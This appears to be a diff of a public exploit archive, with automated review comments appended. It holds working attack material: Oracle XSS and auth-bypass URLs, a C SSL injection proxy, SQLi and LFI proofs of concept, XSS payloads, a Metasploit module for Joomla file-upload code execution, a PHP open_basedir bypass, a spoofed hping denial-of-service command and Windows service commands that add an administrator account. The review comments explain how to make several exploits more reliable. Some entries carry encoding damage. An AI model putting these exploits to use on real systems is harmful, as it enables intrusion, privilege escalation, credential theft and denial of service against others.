Some of these vulnerabilities may be documented in BID 33177 (Oracle January 2009 Critical Patch Update Multiple Vulnerabilities). Reportedly, the HTML-injection and some authentication-bypass vulnerabilities were addressed in the Oracle January 2009 Critical Patch Update. Full details are not currently available. We will update this BID as more information emerges.
Oracle E-Business Suite 10 and 11 are vulnerable; other versions may also be affected.
Authentication bypass:
http://www.example.com:port/OA_HTML/OA.jsp
http://www.example.com:port/OA_HTML/RF.jsp
http://www.example.com:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id]
http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=[page_id]
http://www.example.com:8888/pls/TEST/oracleconfigure.customize?p_page_id=1
HTML injection:
http://www.example.com:port/pls/[DADName]/icx_define_pages.editpagelist
http://www.example.com:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id]
http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=[page_id]
http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=CREATE
It is important to note that our testing has indicated that different versions have different mitigation levels of this vulnerability, requiring, in some situations, utilizing XSS evasion techniques to overcome certain input validation and sanitation mechanisms:
* For earlier versions, injecting a simple <SCRIPT> suffices:
<SCRIPT>alert(<28>XSS')<SCRIPT>
* Some versions limit the permitted characters, and thus require the tester to inset Java-script without utilizing tags, by injecting a script into the text box as follows:
");alert('XSS');//
* Later versions appear to also enforce server-side length restrictions on the vulnerable parameters. As a result, multiple separate injections are required to achieve script execution, such as:
");/*
*/alert/*
*/(/*
*/<2F>XSS'/*
*/);//
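Review bot: the added file carries encoding artifacts from a non-UTF-8 source: `<SCRIPT>alert(<28>XSS')<SCRIPT>` and `*/<2F>XSS'/*` contain `<28>` and `<2F>` where a quote character was in the original advisory. Re-encode the file as UTF-8 (or plain ASCII) before it lands; "inset Java-script" in the second bullet should also read "insert JavaScript".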

@ -1,421 +0,0 @@
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>
#include <openssl/ssl3.h>
void
fail(const char *proc)
{
perror(proc);
exit(1);
}
void
setup_server
(int *sock, int port)
{
struct sockaddr_in sa;
int s, r, i;
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == -1)
fail("setup_server:socket");
i = 1;
r = setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &i, sizeof(i));
if (r == -1)
fail("setup_server:setsockopt(SO_REUSEADDR)");
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = INADDR_ANY;
sa.sin_port = htons(port);
r = bind(s, (struct sockaddr *) &sa, sizeof(sa));
if (r == -1)
fail("setup_server:bind");
r = listen(s, 5);
if (r == -1)
fail("setup_server:listen");
*sock = s;
}
void
do_accept
(int *accepted, int sock)
{
struct sockaddr_in sa;
socklen_t sl;
int s;
sl = sizeof(sa);
s = accept(sock, (struct sockaddr *) &sa, &sl);
if (s == -1)
fail("do_accept:accept");
fprintf(stderr, "accepted %s:%d\n",
inet_ntoa(sa.sin_addr), ntohs(sa.sin_port));
*accepted = s;
}
void
setup_client
(int *sock, in_addr_t ip, int port)
{
struct sockaddr_in sa;
int s, r;
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == -1)
fail("setup_server:socket");
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = ip;
sa.sin_port = htons(port);
r = connect(s, (struct sockaddr *) &sa, sizeof(sa));
if (r == -1)
fail("setup_client:connect");
*sock = s;
}
int
xread
(int fd, unsigned char *buf, size_t len)
{
int r, rlen;
rlen = 0;
while (len > 0) {
r = read(fd, buf, len);
if (r == 0)
break;
else if (r == -1)
return -1;
buf += r;
len -= r;
rlen += r;
}
return rlen;
}
struct ssl_io_t
{
SSL *ssl;
int fd;
int raw;
};
extern int
ssl3_read_bytes
(SSL *s, int type, unsigned char *buf, int len, int peek);
int
rec_read
(struct ssl_io_t *io, unsigned char *buf)
{
int r, l;
#if 0
fprintf(stderr, "rec read %s\n",
io->raw & 1 ? "raw" : "cooked");
#endif
if (io->raw & 1) {
r = xread(io->fd, buf, 5);
if (r == 0)
return 0;
else if (r != 5)
fail("rec_read:read1");
if (buf[0] != 0x80)
l = (buf[3] << 8) + buf[4];
else /* ssl2 hack */
/* fail("rec_read:ssl2"); */
l = (buf[1]) - 3;
if (l < 0 || l > (1 << 15)) {
errno = EINVAL;
fail("rec_read:reclen");
}
r = xread(io->fd, buf + 5, l);
if (r != l)
fail("rec_read:read2");
l += 5;
return l;
}
else {
r = ssl3_read_bytes(io->ssl, SSL3_RT_HANDSHAKE, buf + 5, 1<<15, 0);
if (r == 0)
return 0;
else if (r < 0) {
if (io->ssl->s3->change_cipher_spec) {
buf[0] = 0x14;
buf[1] = (io->ssl->version >> 8);
buf[2] = (io->ssl->version & 0xff);
buf[3] = 0;
buf[4] = 1;
buf[5] = 1;
io->raw |= 1;
io->ssl->s3->change_cipher_spec = 0;
return 6;
}
fail("rec_read:ssl3_read_bytes");
}
l = r;
buf[0] = io->ssl->s3->rrec.type;
buf[1] = (io->ssl->version >> 8);
buf[2] = (io->ssl->version & 0xff);
buf[3] = (l >> 8);
buf[4] = (l & 0xff);
return l + 5;
}
}
extern int
ssl3_write_bytes
(SSL *s, int type, const void *buf_, int len);
void
rec_write
(struct ssl_io_t *io, unsigned char *buf, size_t len)
{
int r;
#if 0
fprintf(stderr, "rec write %s\n",
io->raw & 2 ? "raw" : "cooked");
#endif
if (io->raw & 2) {
r = write(io->fd, buf, len);
if (r != len)
fail("rec_write:write");
}
else {
r = ssl3_write_bytes(io->ssl, buf[0], buf + 5, len - 5);
if (r < 0) {
fail("rec_read:ssl3_write_bytes");
}
if (buf[0] == 0x14) {
io->raw |= 2;
}
}
}
void
ssl_io
(struct ssl_io_t *assl, struct ssl_io_t *cssl)
{
struct ssl_io_t *ssls[2];
int maxfd, active;
int i, r, l;
fd_set rfd;
unsigned char buf[1 << 16];
ssls[0] = assl;
ssls[1] = cssl;
active = 3;
maxfd = 0;
for (i = 0; i < 2; i++)
if (ssls[i]->fd >= maxfd)
maxfd = ssls[i]->fd + 1;
while (active) {
FD_ZERO(&rfd);
for (i = 0; i < 2; i++)
if (active & (1 << i))
FD_SET(ssls[i]->fd, &rfd);
r = select(maxfd, &rfd, NULL, NULL, NULL);
if (r == -1)
fail("rec_io:select");
for (i = 0; i < 2; i++) {
if (active & (1 << i) && FD_ISSET(ssls[i]->fd, &rfd)) {
r = rec_read(ssls[i], buf);
if (r == 0) {
shutdown(ssls[i]->fd, SHUT_RD);
shutdown(ssls[1 - i]->fd, SHUT_WR);
active &= ~(1 << i);
continue;
}
l = r;
rec_write(ssls[1 - i], buf, l);
}
}
}
}
void
setup_ssl_ctx
(SSL_CTX **ctx)
{
OpenSSL_add_ssl_algorithms();
SSL_load_error_strings();
*ctx = SSL_CTX_new(SSLv3_client_method());
if (!*ctx)
fail("setup_ssl_ctx:SSL_CTX_new");
}
void
setup_ssl_io
(struct ssl_io_t *io, SSL_CTX *ctx, int sock, int raw)
{
SSL *ssl;
BIO *bio;
ssl = SSL_new(ctx);
if (!ssl)
fail("setup_ssl_ctx:SSL_new");
bio = BIO_new_socket(sock, BIO_NOCLOSE);
if (!bio)
fail("setup_ssl_ctx:BIO_new_socket");
SSL_set_bio(ssl, bio, bio);
SSL_set_connect_state(ssl);
io->ssl = ssl;
io->fd = sock;
io->raw = raw;
}
int
bogus_change_cipher_state
(SSL *ssl, int i)
{
return 0;
}
/* stolen from ssl_locl.h */
typedef struct ssl3_enc_method {
int (*enc)(SSL *, int);
int (*mac)(SSL *, unsigned char *, int);
int (*setup_key_block)(SSL *);
int (*generate_master_secret)(SSL *, unsigned char *, unsigned char *, int);
int (*change_cipher_state)(SSL *, int);
int (*final_finish_mac)(SSL *, EVP_MD_CTX *, EVP_MD_CTX *, const char *, int, unsigned char *);
int finish_mac_length;
int (*cert_verify_mac)(SSL *, EVP_MD_CTX *, unsigned char *);
const char *client_finished_label;
int client_finished_label_len;
const char *server_finished_label;
int server_finished_label_len;
int (*alert_value)(int);
} SSL3_ENC_METHOD;
#define TRICK "GET /ble HTTP/1.0\r\nX-Blah: "
void
hack_ssl
(struct ssl_io_t *assl, struct ssl_io_t *cssl)
{
int r, l;
unsigned char buf[1 << 16];
SSL_METHOD *mth;
r = rec_read(assl, buf);
if (r <= 0)
fail("hack_ssl:rec_read:no i/o");
l = r;
if (buf[0] == 0x16 && buf[1] == 3 &&
(buf[2] == 0 || buf[2] == 1)) {
cssl->raw = 0;
r = SSL_CTX_set_ssl_version
(cssl->ssl->ctx, buf[2] == 0 ?
SSLv3_client_method() : TLSv1_client_method());
if (r != 1)
fail("hack_ssl:SSL_CTX_set_ssl_version");
r = SSL_clear(cssl->ssl);
if (r != 1)
fail("hack_ssl:SSL_clear");
r = SSL_connect(cssl->ssl);
if (r != 1)
fail("hack_ssl:SSL_connect");
/* ssl3_setup_buffers(io->ssl);
ssl_get_new_session(io->ssl, 0); */
r = SSL_write(cssl->ssl, TRICK, sizeof(TRICK)-1);
if (r != sizeof(TRICK)-1)
fail("hack_ssl:SSL_connect");
cssl->ssl->in_handshake++;
cssl->ssl->method->ssl3_enc->change_cipher_state =
bogus_change_cipher_state;
}
else {
/* schedule suicide */
alarm(5);
}
rec_write(cssl, buf, l);
}
#define HTTP_OK "HTTP/1.0 200 Connected\r\n\r\n"
void
handle_http_req
(int sock, in_addr_t *ip, int *port)
{
int r, l, k;
unsigned char buf[1 << 16];
char str[100];
unsigned short num;
struct hostent *he;
l = 0;
for (;;) {
r = read(sock, buf + l, sizeof(buf)-1 - l);
if (r <= 0)
fail("handle_http_req:read");
for (k = l; r > 0; ++k, --r)
if (buf[k] != '\r')
buf[l++] = buf[k];
if (l >= 2 && buf[l-1] == '\n' && buf[l-2] == '\n')
break;
if (l >= sizeof(buf)-1)
fail("handle_http_req:req too big");
}
buf[l] = '\0';
r = sscanf(buf, "CONNECT %99[0-9A-Za-z.-]:%hu", str, &num);
if (r != 2)
fail("handle_http_req:bad request");
he = gethostbyname(str);
if (he == NULL || he->h_length != sizeof(in_addr_t))
fail("handle_http_req:gethostbyname");
r = write(sock, HTTP_OK, sizeof(HTTP_OK)-1);
if (r != sizeof(HTTP_OK)-1)
fail("handle_http_req:write");
*ip = *(in_addr_t *)(he->h_addr_list[0]);
*port = num;
}
int
main
(int argc, const char **argv)
{
pid_t pid;
int ssock, asock, csock;
SSL_CTX *ctx;
in_addr_t ip;
int port;
struct ssl_io_t assl, cssl;
setup_ssl_ctx(&ctx);
setup_server(&ssock, atoi(argv[1]));
for (;;) {
do_accept(&asock, ssock);
pid = fork();
if (pid == -1)
fail("main:fork");
else if (pid == 0) {
close(ssock);
handle_http_req(asock, &ip, &port);
setup_client(&csock, ip, port);
setup_ssl_io(&assl, ctx, asock, 3);
setup_ssl_io(&cssl, ctx, csock, 3);
hack_ssl(&assl, &cssl);
ssl_io(&assl, &cssl);
return 0;
}
else {
close(asock);
}
}
}

@ -1,26 +0,0 @@
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : Bs Auto_Classifieds Script(articlesdetails.php) Sqli Vulnerability
Date : july 5,2010
Critical Level : HIGH
vendor URL :http://www.brotherscripts.com/
Price:$24.95
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description :
Setup your own auto classifieds website with BrotherScripts.com. We are offering a top quality auto listings software which allows car buyers to search available autos for free. The auto listings are highly detailed with photos, dealer/person information and driving directions linked to MapQuest.
Dealers and car sellers can list their properties, too. After a new dealer has registered, he/she is able to select and buy a package depending on how many adverts they want to to post and for the time duration they want to show them. Payments are done via PayPal or 2Checkout. Before expiration of the account the dealer will be informed by sending a few emails - 10 days before the expiration of his account, 5 and 1 days. All dealers' listings are deleted automatically after 24 hours of expiration of his account
#######################################################################################################
Xploit :SQli Vulnerability
DEMO URL :http://server/Auto_Classifieds/articlesdetails.php?id=[sqli]
###############################################################################################################
# 0day no more
# Sid3^effects

@ -1,82 +0,0 @@
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Joomla Component com_dcnews LFI Vulnerability
# Date: 6-11-2010
# Author: Th3 RDX
# Software Link: n/a
# Version: n/a
# Tested on: online Sites
# category: webapp/Joomla
# Code : n/a
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Br0wn Sug4r, Sid3^effects, L0rd CruSad3r,
Sonic , r0073r(inj3ct0r.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, G00g!3 W@rr!0r,
str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
......\m/ INDIAN CYBER ARMY \m/......
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
##############################################################################
%//
----- [ Founder ] -----
Th3 RDX
----- [ E - mail ] -----
th3rdx@gmail.com
%\\
##############################################################################
##############################################################################
%//
----- [Title] -----
Joomla Component com_dcnews LFI Vulnerability
----- [ Vendor ] -----
n/a
%\\
##############################################################################
##############################################################################
%//
----- [ Bug (s) ] -----
----- [ Local File Inclusion ] -----
=> [ EXPLOIT ]
http://server/index.php?option=com_dcnews&view=dcnews&controller=[LFI]
=> [ Example/POC ]
http://server/index.php?option=com_dcnews&view=dcnews&controller=../../../../../../../../../../etc/passwd%00
%\\
##############################################################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam
=> c0d3 for motherland, h4ck for motherland
==> i'm worst than a useless <==
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.
Bug discovered : 06 November 2010
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#End 0Day#

@ -1,5 +0,0 @@
source: http://www.securityfocus.com/bid/10100/info
Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload.
tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=[INT]&sort_mode=[SQL]

@ -1,5 +0,0 @@
source: http://www.securityfocus.com/bid/10100/info
Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload.
tiki-index.php?page=[VPG]&comments_threshold=[INT]&comments_offset=[SQL]

@ -1,5 +0,0 @@
source: http://www.securityfocus.com/bid/10100/info
Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload.
tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[SQL]

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/template_engine.php?server_id=0&dn=%22%3Cscript%3Ealert(&#039;r0t&#039;)%3C/script%3E

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/19180/info
The Zyxel Prestige 660H-61 ADSL Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/Forms/rpSysAdmin?a=%3Cscript%3Ealert(&#039;www.eazel.es&#039;)%3C/script%3E

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/30731/info
Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Freeway 1.4.1.171 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/includes/languages/french/account_newsletters.php? language=../../../../../../../../../../../../../etc/passwd%00

platforms/php/webapps/33396.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37290/info
ZeeJobsite is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects ZeeJobsite 3x; other versions may be vulnerable as well.
http://www.example.com/basic_search_result.php?title=<script>alert(/XSS/)</script>
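Review bot: `platforms/php/webapps/33396.txt` is added as an "Executable file", but it is a plain-text advisory; commit it with mode 100644 so it matches the other `.txt` entries and does not show up in audits of executable files in the repository.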

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37311/info
Ez Cart is prone to is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?action=showcat&cid=1&sid=[XSS]
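Review bot: the description line added in this hunk has a duplicated phrase, "Ez Cart is prone to is prone to a cross-site scripting vulnerability"; drop the repeated "is prone to".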

@ -1,174 +0,0 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla 1.5.12 TinyBrowser File Upload Code Execution',
'Description' => %q{
This module exploits a vulnerability in the TinyMCE/tinybrowser plugin.
This plugin is not secured in version 1.5.12 of joomla and allows the upload
of files on the remote server.
By renaming the uploaded file this vulnerability can be used to upload/execute
code on the affected system.
},
'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['URL', 'http://milw0rm.com/exploits/9296'],
['URL', 'http://developer.joomla.org/security/news/301-20090722-core-file-upload.html'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 1024,
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'July 22 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "Joomla directory path", "/"]),
], self.class)
end
def check
res = send_request_raw({
'uri' => datastore['URI'] + '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
}, 25)
if (res and res.body =~ /flexupload.swf/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def retrieve_obfuscation()
end
def exploit
cmd_php = '<?php ' + payload.encoded + '?>'
# Generate some random strings
cmdscript = rand_text_alpha_lower(20)
boundary = rand_text_alphanumeric(6)
# Static files
directory = '/images/stories/'
tinybrowserpath = '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/'
cmdpath = directory + cmdscript
# Get obfuscation code (needed to upload files)
obfuscation_code = nil
res = send_request_raw({
'uri' => datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='
}, 25)
if (res)
if(res.body =~ /"obfus", "((\w)+)"\)/)
obfuscation_code = $1
print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
else
print_error("Error retrieving obfuscation code!")
return
end
end
# Upload shellcode (file ending .ph.p)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
data << "#{cmdscript}.ph.p\r\n--#{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"
data << "Content-Type: application/octet-stream\r\n\r\n"
data << cmd_php
data << "\r\n--#{boundary}--"
res = send_request_raw({
'uri' => datastore['URI'] + tinybrowserpath + "/upload_file.php?folder=/images/stories/&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
}
}, 25)
if (res and res.body =~ /File Upload Success/)
print_status("Successfully uploaded #{cmdscript}.ph.p")
else
print_error("Error uploading #{cmdscript}.ph.p")
end
# Complete the upload process (rename file)
print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
res = send_request_raw({
'uri' => datastore['URI'] + tinybrowserpath + 'upload_process.php?folder=/images/stories/&type=file&feid=&filetotal=1'
})
# Rename the file from .ph.p to .php
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['URI'] + tinybrowserpath + '/edit.php?type=file&folder=',
'vars_post' =>
{
'actionfile[0]' => "#{cmdscript}.ph.p",
'renameext[0]' => 'p',
'renamefile[0]' => "#{cmdscript}.ph",
'sortby' => 'name',
'sorttype' => 'asc',
'showpage' => '0',
'action' => 'rename',
'commit' => '',
}
}, 10)
if (res and res.body =~ /successfully renamed./)
print_status ("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")
else
print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")
end
# Finally call the payload
print_status("Calling payload: #{cmdscript}.php")
res = send_request_raw({
'uri' => "#{datastore['URI'] }images/stories/#{cmdscript}.php"
}, 25)
end
end
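Review bot: the module being removed here has two logic gaps worth recording before it disappears from the archive. First, URI handling is inconsistent: `datastore['URI'] + '/plugins/editors/...'` and `tinybrowserpath + '/upload.php'` both assume no trailing slash and produce a double slash, while the final request `"#{datastore['URI'] }images/stories/#{cmdscript}.php"` assumes a trailing slash; with the default `URI` of "/" the upload requests go to `//plugins/...//upload.php`, which most servers tolerate but `normalize_uri` would make deterministic. Second, failure paths do not stop execution: when `send_request_raw` returns nil the `if (res)` block is skipped and `obfuscation_code` stays nil, yet the upload is still sent with an empty `obfuscate=` value, and after `print_error("Error uploading #{cmdscript}.ph.p")` the module goes on to rename and request a file that was never written; a `return` (or `fail_with`) in both places would avoid the noisy follow-on requests. Minor: `retrieve_obfuscation()` is an empty unused method, and `print_status ("Renamed ...")` has a stray space before the parenthesis.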

@ -1,37 +0,0 @@
Description:
------------
Via this bug , attacker can save a file in path that not allowed in
open_basedir .
Reproduce code:
---------------
<?php
// Author : Sina Yazdanmehr (R3d.W0rm) ; Our Site : http://IrCrash.com
if(!extension_loaded('pdf')){
die('pdf extension required .');
}else{
$__PATH = $_GET['p']; /*The path that u want save file in .ex:
/etc/file.php*/
$__VALUE = $_GET['v']; /*The text that u want save in file .ex:
<?php include $_GET[f];?>*/
if(!isset($__PATH,$__VALUE)){
die('/expl.php?p=[path_u_want_save_file]/[file_name]&v=[value_u_want_sav
e_in_file]');
}
$__IRCRASH = pdf_new();
pdf_open_file($__IRCRASH,$__PATH);
pdf_begin_page($__IRCRASH,612,792);
pdf_add_note($__IRCRASH,100,650,200,750,$__VALUE,'R3d.W0rm','note',0);
pdf_end_page($__IRCRASH);
pdf_close($__IRCRASH);
pdf_delete($__IRCRASH);
print('<p>IrCrash Security Team .</p>');
print('<p>' . $__PATH . "\n" . 'created .</p>');}
?>
Expected result:
----------------
When attacker run this code , a file in a path that attacker input in
`p` in url , whith value that attacker input in `v` in url.
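Review bot: the reproduce code reads `$__PATH = $_GET['p']` and `$__VALUE = $_GET['v']` before the `isset($__PATH,$__VALUE)` check, so a request with missing parameters raises undefined-index notices before the usage text is printed; the check should be `isset($_GET['p'], $_GET['v'])` ahead of the assignments. The description never says which call escapes the restriction; the code makes clear it is `pdf_open_file($__IRCRASH,$__PATH)` writing the output file directly, and the one-line description could say so. The file also lacks the `source:` header the sibling entries carry and records no PHP or PDFlib version, the usage string is split mid-word across two lines ("[value_u_want_sav" / "e_in_file]"), and the "Expected result" sentence is missing its verb (the file is created with the supplied content).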

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/5917/info
A weakness has been reported in some PC Firewall packages that could allow remote denial of service attacks. The problem is in the handling of spoofed traffic.
Under some circumstances, it is possible for remote users to deny service to various sites for users of PC Firewall software. By sending spoofed traffic that could be deemed malicious by the firewall software package, an attacker could effectively limit the sites a system is capable of reaching.
hping -e 13 -d 2 -s 6000 -p 2140 -2 host1.example.com -c 2 -a host2.example.com
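Review bot: "some PC Firewall packages" names no vendor or version, so the entry is not actionable on its own; the affected products should be taken from BID 5917 if it lists them. The hping line is the whole technique and deserves a sentence of explanation: `-2` selects UDP, `-a host2.example.com` spoofs the source address, `-s 6000 -p 2140` set source and destination ports, `-e 13 -d 2` puts the two-byte signature "13" in the payload and `-c 2` sends two packets, so the firewall on host1 sees apparently hostile traffic from host2 and, if it auto-blocks offenders, cuts its own user off from host2.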

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/5917/info
A weakness has been reported in some PC Firewall packages that could allow remote denial of service attacks. The problem is in the handling of spoofed traffic.
Under some circumstances, it is possible for remote users to deny service to various sites for users of PC Firewall software. By sending spoofed traffic that could be deemed malicious by the firewall software package, an attacker could effectively limit the sites a system is capable of reaching.
hping -e 13 -d 2 -s 6000 -p 2140 -2 host1.example.com -c 2 -a host2.example.com
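Review bot: this file is byte-for-byte identical to the one removed in the preceding hunk (same BID 5917 text, same hping command), so the archive held a duplicate entry; removing both is consistent, but if one of the two ids is meant to survive it should be re-added once with the product list filled in rather than kept as an exact copy.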

@ -1,25 +0,0 @@
#######################################################
#
# GPG4Win - GNU Privacy Assistant - GPA.EXE - Crash PoC
# Found By: Dr_IDE
# Tested On: 7RC, XPSP3
# Usage: Paste this into GPA Clipboard, Verify.
#
#######################################################
'''
-----BEGIN PGP MESSAGE-----
Charset: ISO-8859-1
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: If you Verify me in Clipboard Mode, I go BOOM!
Comment: This is the absolute minimum of content to cause the crash
Comment: Doesn't seem to overwrite anything though, even @ 10000+ chars
A==
=B00M
-----END PGP MESSAGE-----
'''
#[pocoftheday.blogspot.com]
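Review bot: "Tested On: 7RC, XPSP3" records the host OS but not the Gpg4win or GPA version, and the "Version: GnuPG v1.4.9 (GNU/Linux)" line is part of the pasted armor, not a statement of the tested build; an affected-version line is needed for the entry to be useful. The input is doubly malformed, which is the interesting part and is not spelled out: `A==` is not valid radix-64 (a single character followed by two padding characters cannot occur), and `=B00M` is a CRC-24 line that cannot match any body, so the crash is in GPA's armor handling of garbage rather than in packet parsing. The author's own comment that nothing is overwritten even at 10000+ characters supports the "Crash PoC" title; this should not be read as more than a denial of service. The `'''` quoting and `#` comments suggest a Python file, but there is no code; pasting the block between the BEGIN and END lines into GPA's clipboard and choosing Verify is the entire procedure.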

@ -1,8 +0,0 @@
To exploit this issue, attackers require local, interactive access to an affected computer.
The following example commands are available:
sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd
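Review bot: the file states the prerequisite as "local, interactive access" but the commands only work if that account holds SERVICE_CHANGE_CONFIG (and start/stop rights) on `AdobeActiveFileMonitor8.0`, which is the actual weakness and is never spelled out; a `sc sdshow "AdobeActiveFileMonitor8.0"` check belongs before the exploitation lines. Two practical caveats are also missing: `sc start` will report a start timeout because `cmd /c` is not a real service executable, yet the command has already run as SYSTEM by then, so the error is expected; and the original binPath is not restored, leaving a broken service, so `sc qc "AdobeActiveFileMonitor8.0"` should be captured first and the path put back afterwards. The `net user adobe kills /add` line sets the password to `kills`, which `runas` will prompt for. The entry also starts mid-description with no `source:` line, unlike the other text entries in this commit.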